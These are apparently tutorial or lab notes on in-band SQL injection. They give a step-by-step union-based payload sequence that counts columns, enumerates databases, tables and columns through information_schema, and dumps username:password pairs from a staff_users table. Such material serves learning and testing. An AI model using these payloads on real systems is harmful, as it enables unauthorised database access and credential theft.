➡️In-Band SQLi

2 types:

  • Error-Based SQLi

  • Union-Based SQLi

Example for an Union-Based SQLi:

  1. Try to find how many columns the original SELECT query return

    1 UNION SELECT 1→ error

    1 UNION SELECT 1,2→ error

    1 UNION SELECT 1,2,3→ success!

    So, in this case, we have 3 columns

  2. If the result is only one the first one, do this: 0 UNION SELECT 1,2,3

  3. Get the database name

    0 UNION SELECT 1,2,database()

  4. And so on with tables and columns that are in the founded database

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

  1. Finally, concat every columns you want the result to dump values

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
PreviousSQLmap quick cheat sheetNextInferential (Blind) SQL Injection

Last updated